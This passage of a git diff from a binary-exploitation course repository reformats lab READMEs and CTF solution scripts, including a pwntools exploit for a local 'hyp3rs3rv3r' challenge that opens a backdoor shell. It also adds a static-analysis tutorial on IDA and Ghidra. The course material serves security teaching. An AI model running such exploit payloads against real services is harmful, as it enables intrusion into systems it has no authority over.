`141.85.224.104:31337`. You can use `netcat` to connect to it. -Investigate the [detective](./activities/11-challenge-detective/src) binary. See what it does and work to get the flag. +This challenge runs remotely at `141.85.224.104:31337`. +You can use `netcat` to connect to it. + +Investigate the [detective](./activities/11-challenge-detective/src) binary. +See what it does and work to get the flag. You can start from the [sol/exploit_template.py](./activities/11-challenge-detective/sol/exploit_template.py) solution template script. ->There is a bonus to this challenge and you will be able to find another flag. See that below. +There is a bonus to this challenge and you will be able to find another flag. +See that below. -**Bonus: Get the Second Flag** +#### Bonus: Get the Second Flag -You can actually exploit the remote [detective](./activities/11-challenge-detective/src) executable and get the second flag. Look thoroughly through the executable and craft your payload to exploit the remote service. +You can actually exploit the remote [detective](./activities/11-challenge-detective/src) executable and get the second flag. +Look thoroughly through the executable and craft your payload to exploit the remote service. ->You need to keep the connection going. Use the construction: `cat /path/to/file - | nc ` +You need to keep the connection going. +Use the construction: `cat /path/to/file - | nc ` ### Extra -If you want some more, have a go at the [bonus](./activities/bonus/src) task. It is a simplified CTF task that you should be able to solve using the information learned in this lab. +If you want some more, have a go at the [bonus](./activities/bonus/src) task. +It is a simplified CTF task that you should be able to solve using the information learned in this lab. -> Hint: This executable needs elevated permissions (run with `sudo`). +Hint: This executable needs elevated permissions (run with `sudo`). ### Further pwning -[pwnable.kr](http://pwnable.kr/) is a wargames site with fun challenges of different difficulty levels. After completing all tutorials and challenges in this session, you should be able to go there and try your hand at the following games from Toddler's bottle: `fd`, `collision`, `bof`, `passcode`, `mistake`, `cmd1`, `blukat` (of course, you are encouraged to try any other challenges, but they might get frustrating, as they require knowledge of notions we will explore in future sessions). +[pwnable.kr](http://pwnable.kr/) is a wargames site with fun challenges of different difficulty levels. +After completing all tutorials and challenges in this session, you should be able to go there and try your hand at the following games from Toddler's bottle: `fd`, `collision`, `bof`, `passcode`, `mistake`, `cmd1`, `blukat` (of course, you are encouraged to try any other challenges, but they might get frustrating, as they require knowledge of notions we will explore in future sessions). ## Further Reading -* [ltrace](https://man7.org/linux/man-pages/man1/ltrace.1.html) -* [syscalls](https://man7.org/linux/man-pages/man2/syscalls.2.html) -* [ptrace](https://man7.org/linux/man-pages/man2/ptrace.2.html) -* [ldconfig](https://man7.org/linux/man-pages/man2/ptrace.2.html) -* [socat](https://linux.die.net/man/1/socat) -* [lsof](https://linux.die.net/man/8/lsof) -* [vim + xxd](https://vim.fandom.com/wiki/Hex_dump#Editing_binary_files) +- [ltrace](https://man7.org/linux/man-pages/man1/ltrace.1.html) +- [syscalls](https://man7.org/linux/man-pages/man2/syscalls.2.html) +- [ptrace](https://man7.org/linux/man-pages/man2/ptrace.2.html) +- [ldconfig](https://man7.org/linux/man-pages/man2/ptrace.2.html) +- [socat](https://linux.die.net/man/1/socat) +- [lsof](https://linux.die.net/man/8/lsof) +- [vim + xxd](https://vim.fandom.com/wiki/Hex_dump#Editing_binary_files) diff --git a/chapters/binary-analysis/static-analysis/demos/01-tutorial-disassemble-methods/README.md b/chapters/binary-analysis/static-analysis/demos/01-tutorial-disassemble-methods/README.md index 02a3cd9..115f659 100644 --- a/chapters/binary-analysis/static-analysis/demos/01-tutorial-disassemble-methods/README.md +++ b/chapters/binary-analysis/static-analysis/demos/01-tutorial-disassemble-methods/README.md @@ -1 +1 @@ -# Disassemble methods +# Disassemble Methods diff --git a/chapters/binary-analysis/static-analysis/demos/02-tutorial-ida-time/README.md b/chapters/binary-analysis/static-analysis/demos/02-tutorial-ida-time/README.md index 02a3cd9..115f659 100644 --- a/chapters/binary-analysis/static-analysis/demos/02-tutorial-ida-time/README.md +++ b/chapters/binary-analysis/static-analysis/demos/02-tutorial-ida-time/README.md @@ -1 +1 @@ -# Disassemble methods +# Disassemble Methods diff --git a/chapters/binary-analysis/static-analysis/demos/03-tutorial-cpp-executables/README.md b/chapters/binary-analysis/static-analysis/demos/03-tutorial-cpp-executables/README.md index 02a3cd9..115f659 100644 --- a/chapters/binary-analysis/static-analysis/demos/03-tutorial-cpp-executables/README.md +++ b/chapters/binary-analysis/static-analysis/demos/03-tutorial-cpp-executables/README.md @@ -1 +1 @@ -# Disassemble methods +# Disassemble Methods diff --git a/chapters/binary-analysis/static-analysis/drills/04-challenge-crypto-crackme/sol/crackme-04-gen.py b/chapters/binary-analysis/static-analysis/drills/04-challenge-crypto-crackme/sol/crackme-04-gen.py index 0598d3c..a8699aa 100644 --- a/chapters/binary-analysis/static-analysis/drills/04-challenge-crypto-crackme/sol/crackme-04-gen.py +++ b/chapters/binary-analysis/static-analysis/drills/04-challenge-crypto-crackme/sol/crackme-04-gen.py @@ -10,6 +10,7 @@ sha1_key = hashlib.sha1(KEY) digest_key = sha1_key.digest() + def RC4(data, key): x = 0 box = range(256) @@ -23,9 +24,10 @@ def RC4(data, key): y = (y + box[x]) % 256 box[x], box[y] = box[y], box[x] out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256])) - return ''.join(out) + return "".join(out) + -shuffle_key = "".join([ digest_key[7 * i % 20] for i in range(len(digest_key))]) +shuffle_key = "".join([digest_key[7 * i % 20] for i in range(len(digest_key))]) rc4_msg = RC4(MSG, KEY) f = open(FILE, "wb") diff --git a/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit.py b/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit.py index 81329cf..f4625e3 100755 --- a/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit.py +++ b/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit.py @@ -4,13 +4,13 @@ payload += p32(0x8049378) payload += b" HTTP/1.1" -io = remote('127.0.0.1', 4242) +io = remote("127.0.0.1", 4242) io.sendline(payload) -sleep(1) # the server is not immediatly created +sleep(1) # the server is not immediately created -io = remote('127.0.0.1', 42042) +io = remote("127.0.0.1", 42042) io.interactive() diff --git a/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit_template.py b/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit_template.py index 5927e75..4563170 100644 --- a/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit_template.py +++ b/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit_template.py @@ -2,12 +2,12 @@ payload = "GET /" -io = remote('127.0.0.1', 4242) +io = remote("127.0.0.1", 4242) -payload = #TODO +payload = TODO io.sendline(payload) -sleep(1) # the server is not immediatly created +sleep(1) # the server is not immediately created -io = remote('127.0.0.1', 42042) +io = remote("127.0.0.1", 42042) io.interactive() diff --git a/chapters/binary-analysis/static-analysis/reading/README.md b/chapters/binary-analysis/static-analysis/reading/README.md index e97fb66..775e4a5 100644 --- a/chapters/binary-analysis/static-analysis/reading/README.md +++ b/chapters/binary-analysis/static-analysis/reading/README.md @@ -1 +1,384 @@ -# Reading +# Static Analysis + +## Table of Contents + +- [Introduction](#introduction) +- [Disassembling executables](#disassembling-executables) + - [Linear Sweep](#linear-sweep) + - [Recursive Traversal](#recursive-traversal) +- [IDA and Ghidra](#ida-and-ghidra) + - [IDA tips & tricks](#ida-tips--tricks) + - [IDA Pro and Ghidra](#ida-pro-and-ghidra) +- [C++](#c) +- [Further reading](#further-reading) +- [Challenges](#challenges) + - [04. crypto_crackme](#04-crypto_crackme) + - [05. broken](#05-broken) + - [06. hyp3rs3rv3r](#06-hyp3rs3rv3r) + +## Introduction + +Sometimes we are either unable or reluctant to run an unknown executable. +This inability to run the file can be caused by a multitude of factors, such as not having the correct dependencies or runtimes for it. +In addition, it is often unsafe to run binaries without analysing them first. +Today we'll learn about one method of analysis, called **static analysis**. + +Thus, static analysis allows us to understand the behaviour of the application by displaying either its assembly code or an equivalent high-level code. +In order to obtain the assembly code, via a procedure called **disassembling**, currently there are two approaches being used, which we'll describe in the following sections. +The high-level code, is _deduced_ from the machine code, through a more complex process called **decompilation**, which sometimes might make it a bit inaccurate, when compared to the assembly code. + +## Disassembling Executables + +There are two main strategies when it comes to disassembly. +They are called **Linear Sweep** and **Recursive Traversal**. +As we'll see below, the main difference between the two is their accuracy + +### Linear Sweep + +The first strategy that we'll look at is _Linear Sweep_. +A very popular tool that uses this strategy is `objdump`. +What _Linear Sweep_ does is it parses the `.text` section of the executable from the beginning to the end and translates each encountered machine code instruction into its equivalent Assembly instruction. +It's a fast and simple algorithm. +Being so simple, however, renders it vulnerable to being mislead. +This can happen in a few ways. +One way is to insert an inappropriate instruction somewhere in the `.text` section. +When the algorithm reaches it, it will try to interpret it as something meaningful and output a completely different Assembly code that would make no sense. + +Let's consider the code below, which is also available [in this repo](https://github.com/hexcellents/sss-exploit/blob/master/sessions/04-static-analysis/activities/01-tutorial-disassemble-methods/src/wrong.c): + +```c +int main() +{ + asm volatile( + "A: jmp B\n\t" + ".byte 0xde\n\t" + ".byte 0xad\n\t" + ".byte 0xc0\n\t" + ".byte 0xde\n\t" + "jmp -1\n\t" + "B:\n\t" + ); + printf("What is wrong with me :-s?\n"); + return -1; +} +``` + +Take a look at the Makefile rule for `wrong` and notice that it **strips** the binary: + +```makefile +wrong: wrong.o + $(CC) $(CFLAGS) $< -o $@ + -strip $@ +``` + +If we remove the line at the end of the snipped above and then disassemble the executable, we can see our inline assembly code (`de ad c0 de`) together with the encoding of `jmp -1`. +The binary code is as expected, but the way it's interpreted is completely off. +This happens because _objdump_ gets "confused" when reaching the bytes `de ad c0 de` and can't figure out that the code is meaningless. + +```asm +080491ab : + 80491ab: eb 09 jmp 80491b6 + 80491ad: de ad c0 de e9 49 fisubr WORD PTR [ebp+0x49e9dec0] + 80491b3: 6e outs dx,BYTE PTR ds:[esi] + 80491b4: fb sti + 80491b5: f7 .byte 0xf7 + +080491b6 : + 80491b6: 83 ec 0c sub esp,0xc +``` + +If we restore the line where the binary is stripped, recompile and disassemble it once more, we see that this time, `objdump` gets completely lost when it encounters our `de ad c0 de` sequence. +This is because, previously, it used symbols in the binary, such as `B`, to figure out where some of the real instructions started. +Now, without the help of those symbols, `objdump` doesn't manage to output a coherent Assembly code. + +```asm + 804840c: eb 09 jmp 8048417 <__libc_start_main@plt+0x127> + 804840e: de ad c0 de e9 e8 fisubr WORD PTR [ebp-0x17162140] + 8048414: 7b fb jnp 8048411 <__libc_start_main@plt+0x121> + 8048416: f7 83 ec 0c 68 c0 84 test DWORD PTR [ebx-0x3f97f314],0xe8080484 + 804841d: 04 08 e8 + 8048420: ac lods al,BYTE PTR ds:[esi] + 8048421: fe (bad) + 8048422: ff (bad) + 8048423: ff 83 c4 10 b8 ff inc DWORD PTR [ebx-0x47ef3c] + 8048429: ff (bad) + 804842a: ff (bad) + 804842b: ff 8b 4d fc c9 8d dec DWORD PTR [ebx-0x723603b3] + 8048431: 61 popa + 8048432: fc cld + 8048433: c3 ret +``` + +In order to avoid traps like the one showcased above, we need to use smarter disassembly techniques, such as _Recursive Traversal_. + +### Recursive Traversal + +Note that, in the example above, the misleading instruction is never executed. +If it were, the program would crash after receiving a `SIGILL` signal and after outputting `Illegal instruction (core dumped)`, because the CPU would not know how to decode that particular instruction. +But if we run the binary above, we notice that it doesn't crash. +So that instruction is nothing but dead code. +As a result, it's useless to us no matter what it means. +And this is where _Recursive Traversal_ comes in. + +This strategy doesn't start the disassembly at the beginning of the `.text` section, but at the entry point (the address of the `_start` symbol) and disassembles the instructions linearly, while also considering **jumps**. +Thus, when encountering code branches, the algorithm follows them and creates what's called a **Control Flow Graph (CFG)**, where each node is called a **Basic Block (BB)** and is made up of instructions that are always executed in that order, regardless of conditional jumps or function calls. +Take a look at the CFG below and note the BBs and the jumps that make up the arches. +The code comes from the `hyp3rs3rv3r` binary, which can be found [here](https://github.com/hexcellents/sss-exploit/tree/master/sessions/04-static-analysis/activities/02-tutorial-ida-time/src). +To make things harder, this executable was also stripped. +![CFG created by IDA](../media/fork_xref_2.png) + +In conclusion, we can look at the CFG as being a DFS (recursive) traversal of the code, separated into BBs, with `ret` instructions acting as _back edges_. + +## IDA and Ghidra + +The tool that we used in order to generate the image above is called [IDA](https://www.hex-rays.com/products/ida/support/download_freeware/). +Next, we'll learn how to use it! + +We'll showcase the functionalities of IDA by disassembling the `hyp3rs3rv3r` binary. +The first screen you are presented with is the following: + +![Initial IDA Screen](../media/ida_initial_screen.png) + +Main components: + +- On the left you have the **Function window** with the list of identified subroutines, functions or external functions called by the binary. +They are color coded according to the legend right above it. +- Under it you have a graph overview of the view presented on the right. +- On the right you have multiple tabs, with the **Function summary** selected in the IDA-view. +We will not be using this. +Instead, we will switch to the complete **Graph View** of functions by pressing the spacebar. +This graph is the CFG we mentioned earlier. + +Upon pressing spacebar and navigating in the **Function window** to functions that are not coloured (meaning they are part of this binary) we get the following view: +![IDA - First View](../media/ida_first_view.png) + +When reversing binaries, we will see this particular Assembly construct a lot, as it is the standard one generated by `gcc`. +Remember from [the "Executables an Processes" session](../../executables-and-processes/reading) that [`__libc_start_main`](refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB-Core-generic/baselib---libc-start-main-.html) is the wrapper that calls `main`. +We now rename the last argument pushed on the stack to main. +Press `n` and enter the new name. +Now you have your first function identified. +Click on it to see what `main` does: + +![main](../media/ida_main.png) + +Note how the execution is neatly laid out in the CFG view. +If you look at the left panel you can see the complete view. +The execution is divided because of conditional and unconditional branches. +Let's figure out what happens by analyzing the assembly code: + +First we have the function prologue, stack alignment and stack allocation: + +```asm +push ebp +mov ebp, esp +and esp, 0FFFFFFF0h +sub esp, 450h +``` + +Next, a variable on the stack is initialized to 1. +If you click on `434h` it will become highlighted and you can scroll through the whole function to see where it's used later. +We'll ignore this for now. + +```asm +mov dword ptr [esp+434h], 1 +``` + +Next, we see the first branching: + +```asm +cmp [ebp+arg_0], 2 +jz short loc_8049068 +``` + +**Remember**: +On 32 bit systems, `[ebp + 0]` is the saved `ebp`, `[ebp + 4]` is the return address and `[ebp + 8]` is the first argument to the current function. +IDA follows a slightly different naming convention: `[ebp + 8]` is named `[ebp+arg_0]`. `[ebp + 12]` is named `[ebp+arg_4]` etc. +You can rename those `arg_*` constructs if you want, anyway. + +So it's referring to the first argument: `argc`. +Basically, what it does is: + +```c +if(argc == 2) { + goto loc_8049068 +} else { +.... +} +``` + +What does the `else` branch do? + +```asm +mov eax, [ebp+arg_4] +mov eax, [eax] +mov [esp+4], eax +mov dword ptr [esp], offset format ; "Usage: %s \n" +call _printf + +mov dword ptr [esp], 0 ; status +call _exit +``` + +It's pretty straightforward if you remember the tasks from [Session 02](https://github.com/hexcellents/sss-exploit/tree/master/sessions/03-executable-file-formats). +The second argument (`argv`) is dereferenced and pushed on the stack along with a format string. +Then `printf` is called. +Next, `exit` is called with a status of 0. + +```c +if(argc == 2) { + goto loc_8049068 +} else { + printf("%s \n", argv[0]); + exit(0); +} +``` + +Now let's do something a bit more advanced: we want to identify the 2 commands that the server accepts by using static analysis. +How do we approach this problem as fast as possible? +We already know that the server accepts multiple clients. +It can do this through forking. +Let's see where `fork` is called in the program. +First find the `fork` function on the left panel and select it. +Now you see a stub to it from the `PLT` section. +We want to find all locations in the program that call this function. +You can achieve this by obtaining all the **cross-references (xrefs)** to it by pressing `x`. +You should get the following screen: + +![fork cross-references 1](../media/fork_xref_1.png) + +Click that location and you will get to the forking point: + +![fork cross-references 2](../media/fork_xref_2.png) + +You can see that the return value is stored on the stack at `[esp+438h]`, some error checking (`perror` and `exit`) is done and then the return value is checked for 0 (as we traditionally do for `fork` calls). +The child will execute `sub_8048ED7` and the parent will loop back. +You can rename `sub_8048ED7` to something more legible such as `handle_child_process` +In this function you can now clearly see the two commands and which function is called for each: + +![handle_child_process](../media/handle_child_process.png) + +It looks like the one on the left, `sub_8048B0B` handles the `LIST` command so we rename it to `handle_LIST`. +As expected, it calls `opendir` and `readdir` to read all the files in the current directory, then writes them to the socket. + +![handle_LIST](../media/handle_LIST.png) + +### IDA tips & tricks + +- Saving progress is disabled for the trial version. + However, you can save a limited (but useful) subset of your work using `File -> Produce File -> Dump database to IDC file` and then load it next time using `File -> Script File`. +- If you close some windows and don't know how to get them back you can reset the layout using `Windows->Reset Desktop`. +- If you want to return to the previous view you can press `Escape`. +- When you want to view code as in `objdump` you only need to press `Spacebar` once. + And then again to return to CFG mode. +- If there is a hex value and you want to convert it to decimal (or back) press `h`. +- Converting hex/dec values to _ASCII_: press `r`. +- If you want to write comments next to an instruction or a function press `:`. + +### IDA Pro and Ghidra + +IDA Pro is installed on the Kali virtual machine. +The main difference between it and the free version is that the Pro one can also **decompile** the code based on the CFGs listed above. +This will come in extremely useful as we hack more and more binaries. + +Another tool that is capable of decompiling the code in an executable is [Ghidra](https://ghidra-sre.org/). +One advantage of Ghidra over IDA is that Ghidra displays both the C and the Assembly code side by side. +This allows us to correlate the two and reap the benefits of both of them at the same time. + +## C++ + +Things look slightly different when we try to hack executables that have been compiled from C++ code, instead of C. +The difference comes from the way symbols (method symbols in particular) are handled by C++ compilers. +Let's disassemble the code below and see how its symbols look: + +```code c +##include +using namespace std; +int main() +{ + cout << "Hello world" << endl; + return 0; +} +``` + +Disassembling it in IDA looks familiar at first + +![IDA start](../media/ida_c%2B%2B_start.png) + +But then the fun starts: + +![IDA main](../media/ida_c%2B%2B_main.png) + +As we can see, all symbols look almost as if they were encrypted. +In fact, this process is called **name mangling**. +If we take a closer look at them, however, we can distinguish some clues about those function calls, for example. +The first one contains the sequences `char_traits` and `basic_ostream`, the former being a C++ abstraction for string operations, while the latter is a base class for output operators, such as `<<`. + +IDA can demangle strings such as the ones above by itself. +Some recommended settings (you may prefer something different) are the following: + +- `Options -> Demangled names` +- Show demangled C++ names as `Names` +- `Setup short names` +- Click `Only main name` + +These settings only display the important classes and namespaces that make up each method, like this: + +![IDA demangled](../media/ida_c%2B%2B_demangled.png) + +## Further reading + +More information about name mangling can be obtained at: + +- +- on demand demangling: or `c++filt` + +You can find out more information about the internals of C++ in general, using the following references: + +- (in Romanian) +- +- + +## Challenges + +### 04. crypto_crackme + +The `crypto_crackme` binary is an application that asks for a secret and uses it to decrypt a message. +In order to solve this task, you have to retrieve the message. + +- Open the binary using IDA and determine the program control flow. + What is it doing after fetching the secret? + It seems to be consuming a lot of CPU cycles. + If possible, use IDA to patch the program and reduce the execution time of the application. + Use `Edit -> Patch program -> Change byte...` +- Next, it looks like the program tries to verify if the secret provided is correct. + Where is the secret stored? + Is it stored in plain text? + Find out what the validation algorithm is. +- Now break it and retrieve the message! + +**Important!**: +Unfortunately, the virtual machine doesn't support the `libssl1.0.0` version of SSL library. +Use the library files in the task archive and run the executable using: + +```console +LD_LIBRARY_PATH=. ./crypto_crackme +``` + +You can break password hashes (including SHA1) on [CrackStation](https://crackstation.net/). + +### 05. broken + +The `broken` binary is asking you for the correct password. +Investigate the binary and provide it with the correct password. +If you provided the correct password the message `That's correct! The password is '...'`. + +### 06. hyp3rs3rv3r + +Investigate the `hyp3rs3rv3r` binary and find out where the backdoor function is. +Note that since it's not directly called, IDA doesn't think of it as a procedure, so it won't come up on the left pane. +Figure out a way around this. +When you find that code block you can press `p` on the first instruction to help IDA see it as a procedure. + +**Hint**: +In order to exploit the vulnerability in Ubuntu, you should use `netcat-traditional`. +You can switch from `netcat-openbsd` to `netcat-traditional` using the steps described [here](https://stackoverflow.com/questions/10065993/how-to-switch-to-netcat-traditional-in-ubuntu). diff --git a/chapters/binary-analysis/static-analysis/reading/README_2.md b/chapters/binary-analysis/static-analysis/reading/README_2.md deleted file mode 100644 index 00a9720..0000000 --- a/chapters/binary-analysis/static-analysis/reading/README_2.md +++ /dev/null @@ -1,301 +0,0 @@ -# Static Analysis - -## Table of Contents - -- [Introduction](#introduction) -- [Disassembling executables](#disassembling-executables) - - [Linear Sweep](#linear-sweep) - - [Recursive Traversal](#recursive-traversal) -- [IDA and Ghidra](#ida-and-ghidra) - - [IDA tips & tricks](#ida-tips--tricks) - - [IDA Pro and Ghidra](#ida-pro-and-ghidra) -- [C++](#c) -- [Further reading](#further-reading) -- [Challenges](#challenges) - - [04. crypto_crackme](#04-crypto_crackme) - - [05. broken](#05-broken) - - [06. hyp3rs3rv3r](#06-hyp3rs3rv3r) - -# Introduction - -Sometimes we are either unable or reluctant to run an unknown executable. This inability to run the file can be caused by a multitude of factors, such as not having the correct dependencies or runtimes for it. In addition, it is often unsafe to run binaries without analysing them first. Today we'll learn about one method of analysis, called **static analysis**. - -Thus, static analysis allows us to understand the behaviour of the application by displaying either its assembly code or an equivalent high-level code. In order to obtain the assembly code, via a procedure called **disassembling**, currently there are two approaches being used, which we'll describe in the following sections. The high-level code, is _deduced_ from the machine code, through a more complex process called **decompilation**, which sometimes might make it a bit inaccurate, when compared to the assembly code. - -# Disassembling executables - -There are two main strategies when it comes to disassembly. They are called **Linear Sweep** and **Recursive Traversal**. As we'll see below, the main difference between the two is their accuracy - -## Linear Sweep - -The first strategy that we'll look at is _Linear Sweep_. A very popular tool that uses this strategy is `objdump`. What _Linear Sweep_ does is it parses the `.text` section of the executable from the beginning to the end and translates each encountered machine code instruction into its equivalent Assembly instruction. It's a fast and simple algorithm. Being so simple, however, renders it vulnerable to being mislead. This can happen in a few ways. One way is to insert an inappropriate instruction somewhere in the `.text` section. When the algorithm reaches it, it will try to interpret it as something meaningful and output a completely different Assembly code that would make no sense. - -Let's consider the code below, which is also available [in this repo](https://github.com/hexcellents/sss-exploit/blob/master/sessions/04-static-analysis/activities/01-tutorial-disassemble-methods/src/wrong.c): - -```c -int main() -{ - asm volatile( - "A: jmp B\n\t" - ".byte 0xde\n\t" - ".byte 0xad\n\t" - ".byte 0xc0\n\t" - ".byte 0xde\n\t" - "jmp -1\n\t" - "B:\n\t" - ); - printf("What is wrong with me :-s?\n"); - return -1; -} -``` - -Take a look at the Makefile rule for `wrong` and notice that it **strips** the binary: - -```makefile -wrong: wrong.o - $(CC) $(CFLAGS) $< -o $@ - -strip $@ -``` - -If we remove the line at the end of the snipped above and then disassemble the executable, we can see our inline assembly code (`de ad c0 de`) together with the encoding of `jmp -1`. The binary code is as expected, but the way it's interpreted is completely off. This happens because _objdump_ gets "confused" when reaching the bytes `de ad c0 de` and can't figure out that that code is meaningless. - -```asm -080491ab : - 80491ab: eb 09 jmp 80491b6 - 80491ad: de ad c0 de e9 49 fisubr WORD PTR [ebp+0x49e9dec0] - 80491b3: 6e outs dx,BYTE PTR ds:[esi] - 80491b4: fb sti - 80491b5: f7 .byte 0xf7 - -080491b6 : - 80491b6: 83 ec 0c sub esp,0xc -``` - -If we restore the line where the binary is stripped, recompile and disassemble it once more, we see that this time, `objdump` gets completely lost when it encounters our `de ad c0 de` sequence. This is because, previously, it used symbols in the binary, such as `B`, to figure out where some of the real instructions started. Now, without the help of those symbols, `objdump` doesn't manage to output a coherent Assembly code. - -```asm - 804840c: eb 09 jmp 8048417 <__libc_start_main@plt+0x127> - 804840e: de ad c0 de e9 e8 fisubr WORD PTR [ebp-0x17162140] - 8048414: 7b fb jnp 8048411 <__libc_start_main@plt+0x121> - 8048416: f7 83 ec 0c 68 c0 84 test DWORD PTR [ebx-0x3f97f314],0xe8080484 - 804841d: 04 08 e8 - 8048420: ac lods al,BYTE PTR ds:[esi] - 8048421: fe (bad) - 8048422: ff (bad) - 8048423: ff 83 c4 10 b8 ff inc DWORD PTR [ebx-0x47ef3c] - 8048429: ff (bad) - 804842a: ff (bad) - 804842b: ff 8b 4d fc c9 8d dec DWORD PTR [ebx-0x723603b3] - 8048431: 61 popa - 8048432: fc cld - 8048433: c3 ret -``` - -In order to avoid traps like the one showcased above, we need to use smarter disassembly techniques, such as _Recursive Traversal_. - -## Recursive Traversal - -Note that, in the example above, the misleading instruction is never executed. If it were, the program would crash after receiving a `SIGILL` signal and after outputting `Illegal instruction (core dumped)`, because the CPU would not know how to decode that particular instruction. But if we run the binary above, we notice that it doesn't crash. So that instruction is nothing but dead code. As a result, it's useless to us no matter what it means. And this is where _Recursive Traversal_ comes in. - -This strategy doesn't start the disassembly at the beginning of the `.text` section, but at the entry point (the address of the `_start` symbol) and disassembles the instructions linearly, while also considering **jumps**. Thus, when encountering code branches, the algorithm follows them and creates what's called a **Control Flow Graph (CFG)**, where each node is called a **Basic Block (BB)** and is made up of instructions that are always executed in that order, regardless of conditional jumps or function calls. Take a look at the CFG below and note the BBs and the jumps that make up the arches. The code comes from the `hyp3rs3rv3r` binary, which can be found [here](https://github.com/hexcellents/sss-exploit/tree/master/sessions/04-static-analysis/activities/02-tutorial-ida-time/src). To make things harder, this executable was also stripped. -![CFG created by IDA](../media/fork_xref_2.png) - -In conclusion, we can look at the CFG as being a DFS (recursive) traversal of the code, separated into BBs, with `ret` instructions acting as _back edges_. - -# IDA and Ghidra - -The tool that we used in order to generate the image above is called [IDA](https://www.hex-rays.com/products/ida/support/download_freeware/). Next, we'll learn how to use it! - -We'll showcase the functionalities of IDA by disassembling the `hyp3rs3rv3r` binary. The first screen you are presented with is the following: -![Initial IDA Screen](../media/ida_initial_screen.png) - -Main components: - -- On the left you have the **Function window** with the list of identified subroutines, functions or external functions called by the binary. They are color coded according to the legend right above it. -- Under it you have a graph overview of the view presented on the right. -- On the right you have multiple tabs, with the **Function summary** selected in the IDA-view. We will not be using this. Instead, we will switch to the complete **Graph View** of functions by pressing the spacebar. This graph is the CFG we mentioned earlier. - -Upon pressing spacebar and navigating in the **Function window** to functions that are not coloured (meaning they are part of this binary) we get the following view: -![IDA - First View](../media/ida_first_view.png) - -When reversing binaries, we will see this particular Assembly construct a lot, as it is the standard one generated by `gcc`. Remember from [Session 02](https://github.com/hexcellents/sss-exploit/tree/master/sessions/03-executable-file-formats) that [\_\_libc_start_main](refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB-Core-generic/baselib---libc-start-main-.html) is the wrapper that calls `main`. We now rename the last argument pushed on the stack to main. Press `n` and enter the new name. Now you have your first function identified. Click on it to see what `main` does: -![main](../media/ida_main.png) - -Note how the execution is neatly layed out in the CFG view. If you look at the left panel you can see the complete view. The execution is divided because of conditional and unconditional branches. Let's figure out what happens by analyzing the assembly code: - -First we have the function prologue, stack alignment and stack allocation: - -```asm -push ebp -mov ebp, esp -and esp, 0FFFFFFF0h -sub esp, 450h -``` - -Next, a variable on the stack is initialized to 1. If you click on `434h` it will become highlighted and you can scroll through the whole function to see where it's used later. We'll ignore this for now. - -```asm -mov dword ptr [esp+434h], 1 -``` - -Next, we see the first branching: - -``` -cmp [ebp+arg_0], 2 -jz short loc_8049068 -``` - ---- - -**Remember!** - -On 32 bit systems, `[ebp + 0]` is the saved `ebp`, `[ebp + 4]` is the return address and `[ebp + 8]` is the first argument to the current function. IDA follows a slightly different naming convention: `[ebp + 8]` is named `[ebp+arg_0]`. `[ebp + 12]` is named `[ebp+arg_4]` etc. You can rename those `arg_*` constructs if you want, anyway. - ---- - -So it's referring to the first argument: `argc`. Basically, what it does is: - -```c -if(argc == 2) { - goto loc_8049068 -} else { -.... -} -``` - -What does the `else` branch do? - -```asm -mov eax, [ebp+arg_4] -mov eax, [eax] -mov [esp+4], eax -mov dword ptr [esp], offset format ; "Usage: %s \n" -call _printf - -mov dword ptr [esp], 0 ; status -call _exit -``` - -It's pretty straightforward if you remember the tasks from [Session 02](https://github.com/hexcellents/sss-exploit/tree/master/sessions/03-executable-file-formats). The second argument (`argv`) is dereferenced and pushed on the stack along with a format string. Then `printf` is called. Next, `exit` is called with a status of 0. - -```c -if(argc == 2) { - goto loc_8049068 -} else { - printf("%s \n", argv[0]); - exit(0); -} -``` - -Now let's do something a bit more advanced: we want to identify the 2 commands that the server accepts by using static analysis. How do we approach this problem as fast as possible? We already know that the server accepts multiple clients. It can do this through forking. Let's see where `fork` is called in the program. First find the `fork` function on the left panel and select it. Now you see a stub to it from the `PLT` section. We want to find all locations in the program that call this function. You can achieve this by obtaining all the **cross-references (xrefs)** to it by pressing `x`. You should get the following screen: -![fork cross-references 1](../media/fork_xref_1.png) - -Click that location and you will get to the forking point: -![fork cross-references 2](../media/fork_xref_2.png) - -You can see that the return value is stored on the stack at `[esp+438h]`, some error checking (`perror` and `exit`) is done and then the return value is checked for 0 (as we traditionally do for `fork` calls). The child will execute `sub_8048ED7` and the parent will loop back. You can rename `sub_8048ED7` to something more legible such as `handle_child_process` -In this function you can now clearly see the two commands and which function is called for each: -![handle_child_process](../media/handle_child_process.png) - -It looks like the one on the left, `sub_8048B0B` handles the `LIST` command so we rename it to `handle_LIST`. As expected, it calls `opendir` and `readdir` to read all the files in the current directory, then writes them to the socket. -![handle_LIST](../media/handle_LIST.png) - -## IDA tips & tricks - -- Saving progress is disabled for the trial version. However, you can save a limited (but useful) subset of your work using `File -> Produce File -> Dump database to IDC file` and then load it next time using `File -> Script File`. -- If you close some windows and don't know how to get them back you can reset the layout using `Windows->Reset Desktop`. -- If you want to return to the previous view you can press `Escape`. -- When you want to view code as in `objdump` you only need to press `Spacebar` once. And then again to return to CFG mode. -- If there is a hex value and you want to convert it to decimal (or back) press `h`. -- Converting hex/dec values to _ASCII_: press `r`. -- If you want to write comments next to an instruction or a function press `:`. - -## IDA Pro and Ghidra - -IDA Pro is installed on the Kali virtual machine. The main difference between it and the free version is that the Pro one can also **decompile** the code based on the CFGs listed above. This will come in extremely useful as we hack more and more binaries. - -Another tool that is capable of decompiling the code in an executable is [Ghidra](https://ghidra-sre.org/). One advantage of Ghidra over IDA is that Ghidra displays both the C and the Assembly code side by side. This allows us to correlate the two and reap the benefits of both of them at the same time. - -# C++ - -Things look slightly different when we try to hack executables that have been compiled from C++ code, instead of C. The difference comes from the way symbols (method symbols in particular) are handled by C++ compilers. Let's disassemble the code below and see how its symbols look: - -```code c 